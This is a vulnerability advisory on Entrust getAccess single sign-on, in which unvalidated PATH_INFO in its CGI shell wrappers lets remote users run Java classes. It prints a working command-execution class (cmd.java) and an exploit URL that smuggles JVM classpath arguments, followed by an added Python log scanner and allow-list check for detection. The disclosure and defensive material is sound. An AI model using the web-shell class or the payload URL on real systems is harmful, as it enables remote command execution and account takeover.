Entrust's getAccess[tm]
getAccess[tm] is a single-sign-on system, often used for large internet portals.
--- snip (http://www.entrust.com) ---
Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing
basic and enhanced security across online applications, from Web browsers, to enterprise applications and
legacy database systems.
--- snip ---
Problem description:
Due to missing input validation it is possible to run (start) Java programs on the "getAccess" machine.
Combined with publicly accessible uploads, or any other way to create class files on the server, this vulnerability could be used to run arbitrary system commands on the target machine (or to change getAccess parameters and steal any user account you want, BTW).
It should also be possible (but not proven yet) to exploit default, install or demo classes shipped with Java or getAccess, which would make the file-upload (creation) part unnecessary.
Example:
Find an exploitable getAccess class (one which accepts parameters) or upload a "command" program:
--- cut here (example cmd.java) ---
import java.io.*;

public class cmd {
    public static void main(String args[]) {
        String s = null;   // original read "s = null;", which does not compile without a type
        try {
            // args[0] is the command and args[1] its argument, as handed over by the CGI shell wrapper
            Process p = Runtime.getRuntime().exec(args[0] + " " + args[1]);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
            // CGI header so the web server returns the command output as a page
            System.out.println("Content-type: text/html\n\n");
            while ((s = stdInput.readLine()) != null) { System.out.println(s); }
            while ((s = stdError.readLine()) != null) { System.out.println(s); }
            System.exit(0);
        }
        catch (IOException e) { e.printStackTrace(); System.exit(-1); }
    }
}
--- cut here ---
Later, an HTTP request to:
http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi
will run "/whereever/cmd.class" and execute "/bin/ls -alsi".
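The defensive counterpart to the request above is (a) an allow-list check on the PATH_INFO that the *.gas.bat wrapper scripts receive before anything is passed on to the JVM, and (b) a scan of existing web-server logs for requests to *.gas.bat that carry URL-encoded whitespace or JVM options after the script name. The following Python script is an added example and not part of the advisory or of Entrust's product; it assumes Common Log Format access logs, uses constructed sample lines (one of which reproduces the request shape shown above), and the SAFE_PATH_INFO allow-list is a hypothetical pattern for what legitimate getAccess PATH_INFO looks like, to be adjusted to the real deployment.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in Common Log Format (not from the advisory
# or any real server). Line 2 reproduces the request shape the advisory describes;
# line 4 is a constructed variant against another *.gas.bat script; line 5 is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2001:10:00:00 +0000] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 512
203.0.113.5 - - [01/Jan/2001:10:00:01 +0000] "GET /sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 4096
198.51.100.9 - - [01/Jan/2001:10:00:02 +0000] "GET /index.html HTTP/1.0" 200 1024
198.51.100.9 - - [01/Jan/2001:10:00:03 +0000] "GET /sek-bin/logout.gas.bat/%20-cp%20/tmp HTTP/1.0" 500 0
198.51.100.9 - - [01/Jan/2001:10:00:04 +0000] "GET /sek-bin/login.gas.bat/portal/home?user=bob HTTP/1.0" 200 800
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# The script part ends at the first ".gas.bat"; everything after it is PATH_INFO.
GAS_RE = re.compile(r'^(?P<script>/\S*?\.gas\.bat)(?P<extra>/\S*)?$')
# Hypothetical allow-list for legitimate PATH_INFO: slash-separated plain tokens only.
SAFE_PATH_INFO = re.compile(r'^(/[A-Za-z0-9_.-]+)*/?$')


def split_gas_request(target):
    """Return (script, decoded PATH_INFO) for a *.gas.bat request target, else None."""
    raw_path = target.split('?', 1)[0]   # drop the query string
    g = GAS_RE.match(raw_path)           # match before decoding: the raw log field has no spaces
    if not g:
        return None
    return g['script'], unquote(g['extra'] or '')


def suspicious_reasons(path_info):
    """Explain why a decoded PATH_INFO is dangerous when handed to a shell wrapper."""
    reasons = []
    if re.search(r'\s', path_info):
        reasons.append('whitespace splits PATH_INFO into extra words for the shell script')
    if re.search(r'(^|[\s/])-(classpath|cp)(\s|$)', path_info):
        reasons.append('JVM classpath option in PATH_INFO')
    if re.search(r'[;&|`$<>]', path_info):
        reasons.append('shell metacharacter in PATH_INFO')
    if '..' in path_info:
        reasons.append('parent-directory reference in PATH_INFO')
    return reasons


def path_info_is_safe(path_info):
    """Allow-list check a wrapper script should apply before passing PATH_INFO on."""
    return bool(SAFE_PATH_INFO.fullmatch(path_info)) and not suspicious_reasons(path_info)


def scan_log(text):
    """One finding per request to a *.gas.bat script whose PATH_INFO fails the allow-list."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = split_gas_request(m['target'])
        if parsed is None:
            continue
        script, path_info = parsed
        if path_info_is_safe(path_info):
            continue
        findings.append({
            'client': m['client'],
            'timestamp': m['ts'],
            'script': script,
            'path_info': path_info,
            'reasons': suspicious_reasons(path_info) or ['PATH_INFO outside allow-list'],
        })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['client']} {f['script']} PATH_INFO={f['path_info']!r}")
        for r in f['reasons']:
            print(f"    - {r}")
```

Run against the constructed sample, the scan flags the two requests whose PATH_INFO decodes to extra whitespace-separated words and a classpath option, and leaves the plain login and the "/portal/home" request alone. The same path_info_is_safe() allow-list is what the wrapper should enforce server-side: rejecting anything that is not a simple slash-separated token removes the ability to smuggle additional arguments to the JVM through the URL.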
Summary:
object: *.gas.bat (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes
(And BTW, I would NEVER EVER recommend using shell scripts for authentication purposes!)
RC-EOF